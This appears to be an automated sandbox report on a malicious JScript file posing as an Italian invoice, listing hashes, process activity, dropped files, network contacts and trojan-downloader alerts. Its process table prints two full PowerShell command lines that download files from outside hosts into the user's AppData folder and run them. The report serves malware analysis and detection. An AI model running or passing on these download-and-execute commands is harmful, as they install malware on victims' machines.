File name: | _Fattura 2019_36.jse |
Full analysis: | https://app.any.run/tasks/70d7b1f6-c146-4b59-9635-c82f37fcdb38 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 16:54:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | A41E0628B7EC17FB2070B344A726A41B |
SHA1: | 1D789C5241B6377EB759FFFBF3D73BD74D3CDED8 |
SHA256: | 9C7124F45CFC5AAEE25E14898A209C48336C74BCEBFCAA9AF80B0D62398603AE |
SSDEEP: | 96:6qNF6mQp4ROANYuuX/JwzBcdjQVmrvbZs4fXvr+nLlx/grTznaRuXjJr1MCq0nkl:UmQpcxizBwzBAyqze4fXinRxorTuajJm |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3476 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Fattura 2019_36.jse" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2584 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cdfsvjv = $env:APPDATA + 'SearchI32exe.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://fm.centeredinself.com/index',$cdfsvjv); Start-Process $cdfsvjv; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2772 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $fwgcjcvad = $env:APPDATA + 'hp14601.jpg.jpg'; ( New-Object System.Net.WebClient ).DownloadFile('http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg',$fwgcjcvad); Start-Process $fwgcjcvad; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3172 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3796 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2584 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N5FSEADHTZ4HPCRBDT81.temp | — | |
MD5:— | SHA256:— | |||
2772 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QP6JDVICI8ZWWM907A0S.temp | — | |
MD5:— | SHA256:— | |||
3172 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsDB81.tmp | — | |
MD5:— | SHA256:— | |||
3172 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsDB82.tmp | — | |
MD5:— | SHA256:— | |||
2772 | powershell.exe | C:\Users\admin\AppData\Roaminghp14601.jpg.jpg | image | |
MD5:3470A9058F7B8A3858C0FEAF8A3E2BD3 | SHA256:C835879D0E3AE1CBA698B49481DA41A26CE605B8C5082ED3309873613D9AF202 | |||
2772 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2584 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2772 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198c19.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2584 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198c0a.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2584 | powershell.exe | C:\Users\admin\AppData\RoamingSearchI32exe.exe | text | |
MD5:C87363BA121297B063E83344E122B6D3 | SHA256:F8BF41177A5F5E808A7CCB648B51080B031F15CA8018D91A576263D6CC626EB6 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2584 | powershell.exe | 185.189.149.177:80 | fm.centeredinself.com | SOFTplus Entwicklungen GmbH | CH | malicious |
2772 | powershell.exe | 62.141.56.35:80 | www.flpscuolafoggia.it | Keyweb AG | DE | unknown |
Domain | IP | Reputation |
---|---|---|
fm.centeredinself.com |
| malicious |
www.flpscuolafoggia.it |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |